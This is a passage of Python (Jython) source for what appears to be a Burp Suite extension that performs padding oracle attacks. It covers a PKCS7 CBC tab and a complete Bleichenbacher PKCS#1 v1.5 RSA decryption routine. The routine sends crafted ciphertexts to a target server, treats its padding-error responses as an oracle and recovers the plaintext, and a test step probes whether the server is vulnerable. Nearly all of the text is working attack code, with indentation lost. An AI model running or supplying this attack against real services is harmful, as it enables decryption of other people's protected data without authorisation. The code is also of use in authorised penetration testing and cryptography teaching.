self.__jComboBoxPadMsgPKCS7 = JComboBox(['Invalid', 'Valid'])
self.__jComboBoxPadMsgPKCS7.setSelectedIndex(0)
self.__jButtonClearPayloadPKCS7 = JButton("Clear Selection",actionPerformed=self.clearPayload_PKCS7)
self.__jButtonSelPayloadPKCS7 = JButton("Select Payload",actionPerformed=self.selectPayload_PKCS7)
self.__jLabelFormatPKCS7 = JLabel("Format:")
self.__jComboBoxFormatPKCS7 = JComboBox(['Hex', 'Base64', 'Decimal'])
self.__jComboBoxFormatPKCS7.setSelectedIndex(0)
self.__jCheckBoxUrlEncodedPKCS7=JCheckBox("Url Encoded")
self.__jButtonTestPKCS7 = JButton("Test", actionPerformed=self.testPayload_PKCS7)
self.__jButtonEncPKCS7 = JButton("Encrypt", actionPerformed=self.encryptPayload_PKCS7)
self.__jButtonDecPKCS7 = JButton("Decrypt", actionPerformed=self.decryptPayload_PKCS7)
self.__jButtonStopPKCS7 = JButton("Stop", actionPerformed=self.stopOperation_PKCS7)
self.__jLabelOutPKCS7 = JLabel("Output")
self.__jTextAreaOutputPKCS7 = JTextArea()
self.__jTextAreaOutputPKCS7.setEditable(False)
self.__jTextAreaOutputPKCS7.setColumns(20)
self.__jTextAreaOutputPKCS7.setRows(5)
self.__jScrollPaneOutPKCS7 = JScrollPane()
self.__jScrollPaneOutPKCS7.setViewportView(self.__jTextAreaOutputPKCS7)
self.__jLabelPlaintextPKCS7 = JLabel("Plaintext:")
self.__textPlaintextPKCS7 = JTextField()
self.__textPlaintextPKCS7.setToolTipText("plaintext in hexadecimal, only used in the encryption operation")
self.__jProgressBarPKCS7 = JProgressBar()
jPanelLayoutPKCS7.setHorizontalGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelReqPKCS7)
.addComponent(self.__jScrollPaneReqPKCS7, GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGap(300, 300, 300)
.addComponent(self.__jButtonSelPayloadPKCS7)
.addGap(20, 20, 20)
.addComponent(self.__jLabelFormatPKCS7)
.addComponent(self.__jComboBoxFormatPKCS7,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
.addComponent(self.__jCheckBoxUrlEncodedPKCS7)
.addGap(20, 20, 20)
.addComponent(self.__jButtonClearPayloadPKCS7))
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelThreadPKCS7)
.addComponent(self.__jLabelBlockSizePKCS7)
.addComponent(self.__jLabelPadMessagePKCS7)
.addComponent(self.__jLabelPlaintextPKCS7))
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__textThreadPKCS7, GroupLayout.PREFERRED_SIZE, 112, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textBlockSizePKCS7, GroupLayout.PREFERRED_SIZE, 112, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPadMessagePKCS7, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPlaintextPKCS7, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jComboBoxPadMsgPKCS7,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addComponent(self.__jLabelOutPKCS7)
.addComponent(self.__jScrollPaneOutPKCS7,GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGap(165, 165, 165)
.addComponent(self.__jButtonTestPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonEncPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonDecPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonStopPKCS7))
.addComponent(self.__jProgressBarPKCS7, GroupLayout.PREFERRED_SIZE, 1080, GroupLayout.PREFERRED_SIZE)
)
jPanelLayoutPKCS7.setVerticalGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addComponent(self.__jLabelReqPKCS7)
.addComponent(self.__jScrollPaneReqPKCS7, GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(15, 15, 15)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jButtonSelPayloadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jLabelFormatPKCS7)
.addComponent(self.__jComboBoxFormatPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jCheckBoxUrlEncodedPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonClearPayloadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelThreadPKCS7)
.addComponent(self.__textThreadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelBlockSizePKCS7)
.addComponent(self.__textBlockSizePKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelPadMessagePKCS7)
.addComponent(self.__textPadMessagePKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxPadMsgPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelPlaintextPKCS7)
.addComponent(self.__textPlaintextPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jLabelOutPKCS7)
.addComponent(self.__jScrollPaneOutPKCS7,GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jButtonTestPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonEncPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonDecPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonStopPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE))
.addGap(50, 50, 50)
.addComponent(self.__jProgressBarPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
)
def stopOperation_PKCS7(self, button):
self.DisplayOutput_PKCS7("Operation halted!\n")
self.gThreadStopPKCS7 = True
self.__jProgressBarPKCS7.setValue(0)
self.__jProgressBarPKCS7.setString("")
def testPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("test")
if(initStatus):
# Start the Test thread
self.__jProgressBarPKCS7.setString("Testing...")
encrypted_string = self.gPayloadPKCS7
self.gOpThreadPKCS7 = threading.Thread(target=self.Test_PKCS7, args=(encrypted_string,))
self.gOpThreadPKCS7.start()
def encryptPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("encrypt")
if(initStatus):
# Start the Encryption Thread
self.__jProgressBarPKCS7.setString("Encrypting...")
self.gOpThreadPKCS7 = threading.Thread(target=self.Encryption_PKCS7)
self.gOpThreadPKCS7.start()
def decryptPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("decrypt")
if(initStatus):
# Start the Decryption Thread
self.__jProgressBarPKCS7.setString("Decrypting...")
encrypted_string = self.gPayloadPKCS7
self.gOpThreadPKCS7 = threading.Thread(target=self.Decryption_PKCS7, args=(encrypted_string,))
self.gOpThreadPKCS7.start()
def clearPayload_PKCS7(self, button):
if self.gHttpRequestRawStringPKCS7 !="":
self.__jEditorPaneReqPKCS7.setText(self.gHttpRequestRawStringPKCS7)
self.gSelectedPayloadPKCS7 = None
# Enable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(True)
def selectPayload_PKCS7(self, button):
# Retrieve the selected payload (getSelectedText() returns None when nothing is selected)
payload = self.__jEditorPaneReqPKCS7.getSelectedText()
# Store the selected payload
self.gSelectedPayloadPKCS7 = payload
if(payload!=None):
    payload = payload.replace("\n", "")
# Check whether the payload is url encoded.
if self.__jCheckBoxUrlEncodedPKCS7.isSelected():
self.gIsPayloadUrlEncodedPKCS7 = True
try:
# Get the payload format and convert it to hex
payload = self.ConverToHexFromPayloadFormat(payload, self.__jComboBoxFormatPKCS7.getSelectedItem(), self.gIsPayloadUrlEncodedPKCS7)
if(payload!=None):
# validate whether the payload is hex
unhexlify(payload.encode())
self.gPayloadPKCS7 = payload
self.gPayloadFormatPKCS7 = self.__jComboBoxFormatPKCS7.getSelectedItem()
# Replace the selected payload with #PAYLOAD# so that we can process it during the attack
self.gHttpRequestStringPKCS7 = self.gHttpRequestRawStringPKCS7.replace(self.gSelectedPayloadPKCS7, "#PAYLOAD#")
# Show the selected payload
bytesDisplay = self.gHttpRequestRawStringPKCS7.encode()
insertionPointChar = chr(167)
bytesDisplay = bytesDisplay.replace(self.gSelectedPayloadPKCS7.encode(), insertionPointChar + self.gSelectedPayloadPKCS7.encode() + insertionPointChar)
self.__jEditorPaneReqPKCS7.setText(bytesDisplay)
# Disable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setEnabled(False)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(False)
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return
def PKCS7(self, invocation):
# Initialize the variables
self.gHttpRequestRawStringPKCS7=""
self.gHttpRequestStringPKCS7=""
self.gPayloadPKCS7=""
self.gPayloadFormatPKCS7=""
self.gSelectedPayloadPKCS7=None
self.gOpThreadPKCS7 = None
self.gIsPayloadUrlEncodedPKCS7 = False
# enable the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setSelectedIndex(0)
self.__jComboBoxFormatPKCS7.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS7.setSelected(False)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(True)
# Get the http request message
invMessages = invocation.getSelectedMessages()
if len(invMessages) == 0:
return
self.gReqResPKCS7 = invMessages[0]
self.gHttpRequestRawStringPKCS7 = self._helpers.bytesToString(self.gReqResPKCS7.getRequest())
self.__jEditorPaneReqPKCS7.setText(self.gHttpRequestRawStringPKCS7)
# Reset all the fields
self.__textPadMessagePKCS7.setText("")
self.__textPlaintextPKCS7.setText("")
self.__jTextAreaOutputPKCS7.setText("")
# switch to the PKCS7 tab
self._jPaddingOracleTab.setSelectedComponent(self.__jPanelPKCS7)
parentTab = self._jPaddingOracleTab.getParent()
parentTab.setSelectedComponent(self._jPaddingOracleTab)
# *************************************** PKCS#1 v1.5 ***************************************
# global variables
gReqResPKCS15 = IHttpRequestResponse
gHttpRequestRawStringPKCS15 = ""
gPayloadPKCS15 = ""
gOpThreadPKCS15 = None
gSelectedPayloadPKCS15 = None
gModulusPKCS15=0
gExponentPKCS15=0
gPadMsgSelPKCS15 = ""
gPadMsgPKCS15 = ""
gByteLenPKCS15 = 0
gQueriesPKCS15 = 0
gTimePKCS15 = 0
gIntervalPKCS15 = namedtuple('Interval', ['lower_bound', 'upper_bound'])
gIsPayloadUrlEncodedPKCS15 = False
def DisplayOutput_PKCS15(self, text):
self.__jTextAreaOutputPKCS15.append(text)
def setGUI_PKCS15(self):
self.__jPanelPKCS15 = JPanel()
jPanelLayoutPKCS15 = GroupLayout(self.__jPanelPKCS15)
self.__jPanelPKCS15.setLayout(jPanelLayoutPKCS15)
jPanelLayoutPKCS15.setAutoCreateGaps(True)
jPanelLayoutPKCS15.setAutoCreateContainerGaps(True)
self.__jLabelReqPKCS15 = JLabel("Request")
self.__jScrollPaneReqPKCS15 = JScrollPane()
self.__jEditorPaneReqPKCS15 = JEditorPane()
self.__jEditorPaneReqPKCS15.setEditable(False)
self.__jScrollPaneReqPKCS15.setViewportView(self.__jEditorPaneReqPKCS15)
self.__jButtonClearPayloadPKCS15 = JButton("Clear Selection",actionPerformed=self.clearPayload_PKCS15)
self.__jButtonSelPayloadPKCS15 = JButton("Select Payload",actionPerformed=self.selectPayload_PKCS15)
self.__jLabelFormatPKCS15 = JLabel("Format:")
self.__jComboBoxFormatPKCS15 = JComboBox(['Hex', 'Base64', 'Decimal'])
self.__jComboBoxFormatPKCS15.setSelectedIndex(0)
self.__jCheckBoxUrlEncodedPKCS15=JCheckBox("Url Encoded")
self.__jLabelPublicExpPKCS15 = JLabel("Public Exponent e:")
self.__textPublicExpPKCS15 = JTextField()
self.__textPublicExpPKCS15.setToolTipText("RSA public exponent in decimal")
self.__jLabelPublicModPKCS15 = JLabel("Public Modulus n:")
self.__textPublicModPKCS15 = JTextField()
self.__textPublicModPKCS15.setToolTipText("RSA public modulus in decimal")
self.__jLabelPadMessagePKCS15 = JLabel("Padding Response:")
self.__textPadMessagePKCS15 = JTextField()
self.__textPadMessagePKCS15.setToolTipText("part or full of the valid or invalid padding response, only used in the decryption operation")
self.__jComboBoxPadMsgPKCS15 = JComboBox(['Invalid', 'Valid'])
self.__jComboBoxPadMsgPKCS15.setSelectedIndex(0)
self.__jLabelUpdateIntervalPKCS15 = JLabel("Update Interval:")
self.__jComboBoxUpdateIntervalPKCS15 = JComboBox(['100', '1000', '10000'])
self.__jComboBoxUpdateIntervalPKCS15.setSelectedIndex(0)
self.__jButtonTestPKCS15 = JButton("Test", actionPerformed=self.testPayload_PKCS15)
self.__jButtonDecPKCS15 = JButton("Decrypt", actionPerformed=self.decryptPayload_PKCS15)
self.__jButtonStopPKCS15 = JButton("Stop", actionPerformed=self.stopOperation_PKCS15)
self.__jLabelOutPKCS15 = JLabel("Output")
self.__jTextAreaOutputPKCS15 = JTextArea()
self.__jTextAreaOutputPKCS15.setEditable(False)
self.__jTextAreaOutputPKCS15.setColumns(20)
self.__jTextAreaOutputPKCS15.setRows(5)
self.__jScrollPaneOutPKCS15 = JScrollPane()
self.__jScrollPaneOutPKCS15.setViewportView(self.__jTextAreaOutputPKCS15)
jPanelLayoutPKCS15.setHorizontalGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelReqPKCS15)
.addComponent(self.__jScrollPaneReqPKCS15, GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGap(300, 300, 300)
.addComponent(self.__jButtonSelPayloadPKCS15)
.addGap(20, 20, 20)
.addComponent(self.__jLabelFormatPKCS15)
.addComponent(self.__jComboBoxFormatPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
.addComponent(self.__jCheckBoxUrlEncodedPKCS15)
.addGap(20, 20, 20)
.addComponent(self.__jButtonClearPayloadPKCS15))
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicExpPKCS15)
.addComponent(self.__jLabelPublicModPKCS15)
.addComponent(self.__jLabelPadMessagePKCS15)
.addComponent(self.__jLabelUpdateIntervalPKCS15))
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__textPublicExpPKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPublicModPKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPadMessagePKCS15, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxUpdateIntervalPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jComboBoxPadMsgPKCS15,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addComponent(self.__jLabelOutPKCS15)
.addComponent(self.__jScrollPaneOutPKCS15,GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addGap(240, 240, 240)
.addComponent(self.__jButtonTestPKCS15)
.addGap(165, 165, 165)
.addComponent(self.__jButtonDecPKCS15)
.addGap(165, 165, 165)
.addComponent(self.__jButtonStopPKCS15))
)
jPanelLayoutPKCS15.setVerticalGroup(
jPanelLayoutPKCS15.createSequentialGroup()
.addComponent(self.__jLabelReqPKCS15)
.addComponent(self.__jScrollPaneReqPKCS15, GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(15, 15, 15)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jButtonSelPayloadPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jLabelFormatPKCS15)
.addComponent(self.__jComboBoxFormatPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jCheckBoxUrlEncodedPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonClearPayloadPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicExpPKCS15)
.addComponent(self.__textPublicExpPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPublicModPKCS15)
.addComponent(self.__textPublicModPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelPadMessagePKCS15)
.addComponent(self.__textPadMessagePKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxPadMsgPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jLabelUpdateIntervalPKCS15)
.addComponent(self.__jComboBoxUpdateIntervalPKCS15, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jLabelOutPKCS15)
.addComponent(self.__jScrollPaneOutPKCS15,GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS15.createParallelGroup()
.addComponent(self.__jButtonTestPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonDecPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonStopPKCS15, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE))
.addGap(50, 50, 50)
)
def BytesToLong_PKCS15(self, bytes_obj):
return int(hexlify(bytes_obj),16)
def LongToBytes_PKCS15(self, integer):
value = hex(integer).replace('0x','').rstrip("L")
if(len(value)%2 != 0):
value = "0" + value
return unhexlify(value)
# math.ceil and math.floor don't work for large integers
def Floor_PKCS15(self, a, b):
return a // b
def Ceil_PKCS15(self, a, b):
return a // b + (a % b > 0)
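# e.g. Floor_PKCS15(7, 2) == 3 and Ceil_PKCS15(7, 2) == 4; unlike math.floor(a/b)
# and math.ceil(a/b), these stay exact for 2048-bit integers because they never
# round-trip through a float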
def Decode_PKCS15(self, encoded):
encoded = encoded[2:]
idx = encoded.index(b'\x00')
message = encoded[idx + 1:]
return message
def Encode_PKCS15(self, message, total_bytes):
# Encodes the given message using PKCS1 v1.5 scheme:
# PKCS1(M) = 0x00 | 0x02 | [non-zero padding bytes] | 0x00 | [M]
# length(PKCS1(M)) = total_bytes
# 11 = 3 constant bytes and at least 8 bytes of padding
padding_byte = b''
if len(message) > total_bytes - 11:
self.DisplayOutput_PKCS15("Message to big for encoding scheme!")
return
pad_len = total_bytes - 3 - len(message)
# non-zero padding bytes
randombyte = random.sample(range(1, 256), pad_len)
for r in randombyte:
padding_byte = chr(r) + padding_byte
encoded = b'\x00\x02' + padding_byte + b'\x00' + message
return encoded
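# e.g. Encode_PKCS15(b"hi", 12) yields b"\x00\x02" + 7 non-zero random bytes + b"\x00hi"
# (12 bytes total), which Decode_PKCS15 reverses by splitting on the first 0x00
# after the two-byte header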
def ServiceRequest_PKCS15(self, ciphertext):
try:
# Convert the payload back to the original format from hex
payload = self.ConvertFromHexToPayloadFormat(ciphertext, self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
if(payload!=None):
# Replace the #PAYLOAD# placeholder with the actual payload
newHttpRequest = self.gHttpRequestStringPKCS15.replace("#PAYLOAD#", payload)
# Update the request with new parameter
reqInfo = self._helpers.analyzeRequest(newHttpRequest)
headers = reqInfo.getHeaders()
param = newHttpRequest[reqInfo.getBodyOffset():]
newHttpRequest = self._helpers.buildHttpMessage(headers, param)
# Send the request
httpService = self.gReqResPKCS15.getHttpService()
res = self._callbacks.makeHttpRequest(self._helpers.buildHttpService(httpService.getHost(),httpService.getPort(), httpService.getProtocol()), newHttpRequest)
return res.getResponse()
except Exception as e:
self.DisplayOutput_PKCS15("Service request Error: {}".format(e))
return ""
def Oracle_PKCS15(self, ciphertext):
# Increment the queries
self.gQueriesPKCS15 +=1
# Retrieve the update interval
updateInterval = int(self.__jComboBoxUpdateIntervalPKCS15.getSelectedItem())
# Report progress based on the update interval
if self.gQueriesPKCS15 % updateInterval == 0:
currentTime = time.time()
self.DisplayOutput_PKCS15("Query: #{} time: {} s\n".format(self.gQueriesPKCS15, round(currentTime - self.gTimePKCS15,3)))
# send the service request
response = self.ServiceRequest_PKCS15(ciphertext)
# if the message is an invalid padding message
if self.gPadMsgSelPKCS15=="Invalid":
if hexlify(self.gPadMsgPKCS15.encode()) in hexlify(response):
return False
else:
return True
# if the message is a valid padding message
else:
if hexlify(self.gPadMsgPKCS15.encode()) not in hexlify(response):
return False
else:
return True
# Step 2.A.
def FindSmallest_PKCS15(self,lower_bound, c):
"""
Find the smallest s >= lower_bound,
such that (c * s^e) (mod n) decrypts to a PKCS conforming string
"""
s = lower_bound
while True:
if(self.gThreadStopPKCS15 == True):
return
attempt = (c * pow(s, self.gExponentPKCS15, self.gModulusPKCS15)) % self.gModulusPKCS15
if self.Oracle_PKCS15(hexlify(self.LongToBytes_PKCS15(attempt)).decode()):
return s
s += 1
# Step 2.C.
def FindInRange_PKCS15(self, a, b, prev_s, B, c):
"""
Given the interval [a, b], reduce the search
only to relevant regions (determined by r)
and stop when an s value that gives
a PKCS1 conforming string is found.
"""
ri = self.Ceil_PKCS15(2 * (b * prev_s - 2 * B), self.gModulusPKCS15)
while True:
if(self.gThreadStopPKCS15 == True):
return
si_lower = self.Ceil_PKCS15(2 * B + ri * self.gModulusPKCS15, b)
si_upper = self.Ceil_PKCS15(3 * B + ri * self.gModulusPKCS15, a)
for si in range(si_lower, si_upper):
attempt = (c * pow(si, self.gExponentPKCS15, self.gModulusPKCS15)) % self.gModulusPKCS15
# get oracle from the server
if self.Oracle_PKCS15(hexlify(self.LongToBytes_PKCS15(attempt)).decode()):
return si
ri += 1
def SafeIntervalInsert_PKCS15(self, M_new, interval):
# Deal with interval overlaps when adding a new one to the list
for i, (a, b) in enumerate(M_new):
# overlap found, construct the larger interval
if (b >= interval.lower_bound) and (a <= interval.upper_bound):
lb = min(a, interval.lower_bound)
ub = max(b, interval.upper_bound)
M_new[i] = self.gIntervalPKCS15(lb, ub)
return M_new
# no overlaps found, just insert the new interval
M_new.append(interval)
return M_new
# Step 3.
def UpdateIntervals_PKCS15(self, M, s, B):
# After the s value is found, compute the new list of intervals
M_new = []
for a, b in M:
r_lower = self.Ceil_PKCS15(a * s - 3 * B + 1, self.gModulusPKCS15)
r_upper = self.Ceil_PKCS15(b * s - 2 * B, self.gModulusPKCS15)
for r in range(r_lower, r_upper):
lower_bound = max(a, self.Ceil_PKCS15(2 * B + r * self.gModulusPKCS15, s))
upper_bound = min(b, self.Floor_PKCS15(3 * B - 1 + r * self.gModulusPKCS15, s))
interval = self.gIntervalPKCS15(lower_bound, upper_bound)
M_new = self.SafeIntervalInsert_PKCS15(M_new, interval)
return M_new
def Bleichenbacher_PKCS15(self, ciphertext):
# Record the initial time
self.gTimePKCS15 = time.time()
self.DisplayOutput_PKCS15("Decrypting ciphertext: {}\n\n".format(self.gSelectedPayloadPKCS15))
# Step 1. is only needed when the ciphertext is
# not PKCS1 conforming
# integer value of ciphertext
c = self.BytesToLong_PKCS15(ciphertext)
B = 2 ** (8 * (self.gByteLenPKCS15 - 2))
M = [self.gIntervalPKCS15(2*B, 3*B-1)]
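# For a k-byte modulus, B = 2^(8(k-2)). Every PKCS#1 v1.5 conforming plaintext
# starts with 0x00 0x02, so the target message m must lie in [2B, 3B-1]; the loop
# below narrows that interval per Bleichenbacher '98 until a == b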
i = 1
while True:
if(self.gThreadStopPKCS15 == True):
return
# Step 2.A.
if i==1:
s = self.FindSmallest_PKCS15(self.Ceil_PKCS15(self.gModulusPKCS15, 3*B), c)
# Step 2.B.
elif len(M) > 1:
s = self.FindSmallest_PKCS15(s + 1, c)
# Step 2.C.
else: # len(M)=1
a, b = M[0]
s = self.FindInRange_PKCS15(a, b, s, B, c)
# Step 3.
M = self.UpdateIntervals_PKCS15(M, s, B)
# Step 4.
if len(M) == 1:
a, b = M[0]
if a == b:
# Update the last query
updateInterval = int(self.__jComboBoxUpdateIntervalPKCS15.getSelectedItem())
if(self.gQueriesPKCS15 % updateInterval !=0):
currentTime = time.time()
self.DisplayOutput_PKCS15("Query: #{} time: {} s\n".format(self.gQueriesPKCS15, round(currentTime - self.gTimePKCS15,3)))
# Output the plaintext
plaintext = self.LongToBytes_PKCS15(a % self.gModulusPKCS15)
plaintext = self.Decode_PKCS15(plaintext)
self.DisplayOutput_PKCS15("\nDecrypted plaintext:\n")
self.DisplayOutput_PKCS15("Hex: {}\n".format(hexlify(plaintext)))
self.DisplayOutput_PKCS15("Bytes: {}\n".format(plaintext))
return
i=i+1
def Test_PKCS15(self):
# compute test value with valid padding
testValidPadValue = self.BytesToLong_PKCS15(self.Encode_PKCS15(b"test_pkcs15",self.gByteLenPKCS15))
testValidPadCipher = pow(testValidPadValue, self.gExponentPKCS15, self.gModulusPKCS15)
testValidPadResult = self.ServiceRequest_PKCS15(hexlify(self.LongToBytes_PKCS15(testValidPadCipher)).decode())
ResInfo = self._helpers.analyzeResponse(testValidPadResult)
testValidPadResponse = testValidPadResult[ResInfo.getBodyOffset():]
# compute test value with invalid padding
testInvalidPadValue = self.BytesToLong_PKCS15(b"test_pkcs15")
testInvalidPadCipher = pow(testInvalidPadValue, self.gExponentPKCS15, self.gModulusPKCS15)
testInvalidPadResult = self.ServiceRequest_PKCS15(hexlify(self.LongToBytes_PKCS15(testInvalidPadCipher)).decode())
ResInfo = self._helpers.analyzeResponse(testInvalidPadResult)
testInvalidPadResponse = testInvalidPadResult[ResInfo.getBodyOffset():]
# The server is likely vulnerable if the response with valid padding differs from the response with invalid padding
if(testValidPadResponse!=testInvalidPadResponse):
self.__jTextAreaOutputPKCS15.setForeground(Color(255, 0, 0))
# Display invalid padding response
self.DisplayOutput_PKCS15("**** Invalid Padding ****\n")
payload = self.ConvertFromHexToPayloadFormat(hexlify(self.LongToBytes_PKCS15(testInvalidPadCipher)).decode(),self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
self.DisplayOutput_PKCS15("Payload:\n{}\n".format(payload))
self.DisplayOutput_PKCS15("Response:\n{}\n\n".format(unhexlify(hexlify(testInvalidPadResponse))))
# Display valid padding response
self.DisplayOutput_PKCS15("**** Valid Padding ****\n")
payload = self.ConvertFromHexToPayloadFormat(hexlify(self.LongToBytes_PKCS15(testValidPadCipher)).decode(),self.gPayloadFormatPKCS15, self.gIsPayloadUrlEncodedPKCS15)
